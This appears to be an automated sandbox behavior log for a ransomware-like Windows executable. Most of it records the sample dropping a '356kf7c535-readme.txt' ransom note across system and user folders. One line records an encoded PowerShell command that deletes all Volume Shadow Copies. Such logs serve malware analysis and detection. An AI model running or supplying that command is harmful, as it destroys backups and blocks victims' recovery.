        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeDirectory created: c:\program files\356kf7c535-readme.txtJump to behavior
        Source: Binary string: SecurityHealthAgent.pdbHeal source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: WscApi.pdbl source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: wscsvc.pdbl source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: shellext.pdbhServic source: zA1pLzHWuQ.exe, 00000000.00000003.826589379.0000000003127000.00000004.00000040.sdmp
        Source: Binary string: WscApi.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: wscui.pdbdb source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthService.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: SecurityCenterBroker.pdbbc source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: WscIsvIf.pdbityCent source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: shellext.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: WscIsvIf.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthSSO.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: WscApi.pdb! source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: SecurityCenterBroker.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: wscui.pdbal source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: SecurityCenterBroker.pdbb. source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthSSO.pdbpdb source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthSSO.pdb.pdbc source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthSSO.pdb.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: wscsvc.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: wscui.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthAgent.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: zA1pLzHWuQ.exeStatic PE information: section name: .i6x
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00BA3139 push esi; retf 0_2_00BA313A
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\program files\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\program files (x86)\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\recovery\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\dbg\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft onedrive\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\oracle\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\regid.1991-06.com.microsoft\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\softwaredistribution\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\usoprivate\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\usoshared\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\windowsholographicdevices\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\public\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\arm\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\setup\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\appv\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\devicesync\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\drm\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\event viewer\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\identitycrl\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\mapdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\mf\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\netframework\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\network\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\office\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\search\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\settings\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\smsrouter\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\spectrum\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\speech_onecore\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\storage health\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\uev\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\user account pictures\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\vault\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\wdf\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows security health\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\winmsipc\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\wwansvc\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft onedrive\setup\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\oracle\java\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\usoprivate\updatestore\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\usoshared\logs\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\windowsholographicdevices\spatialstore\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\desktop\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\documents\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\downloads\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\favorites\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\links\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\music\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\pictures\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\saved games\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\default\videos\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\3d objects\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\contacts\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\downloads\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\favorites\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\links\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\music\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\onedrive\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\pictures\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\recent\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\saved games\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\searches\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\videos\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\public\accountpictures\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\public\desktop\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\public\documents\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\public\downloads\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\public\libraries\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\public\music\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\public\pictures\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\public\videos\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\arm\reader_18.011.20055\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\arm\s\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\arm\{291aa914-a987-4ce9-bd63-ac0a92d435e5}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\setup\{ac76ba86-7ad7-1033-7b44-ac0f074e4100}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\appv\setup\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\machinedata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\productreleases\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\userdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\{9ac08e99-230b-47e8-9721-4577b7f124ea}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\dss\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\keys\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\pcpksp\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\rsa\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\systemkeys\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\device\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\task\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\asimovuploader\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\customtraceprofiles\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\downloadedscenarios\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\downloadedsettings\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\etllogs\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\eventtranscript\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\feedbackhub\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\localtracestore\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\offlinesettings\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\scripts\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\sideload\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\siufloc\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\softlanding\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\softlandingstage\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\tenantstorage\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\windowsanalytics\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\drm\server\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\event viewer\views\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\identitycrl\int\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\identitycrl\production\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\netframework\breadcrumbstore\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\network\connections\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\network\downloader\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\assetcache\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\search\data\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\settings\accounts\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\smsrouter\messagestore\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\speech_onecore\sr\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\uev\inboxtemplates\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\uev\scripts\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\uev\templates\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\clean store\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\features\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\localcopy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\network inspection system\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\platform\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\quarantine\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\support\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\cache\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\cyber\356kf7c535-readme.txtJump to behavior
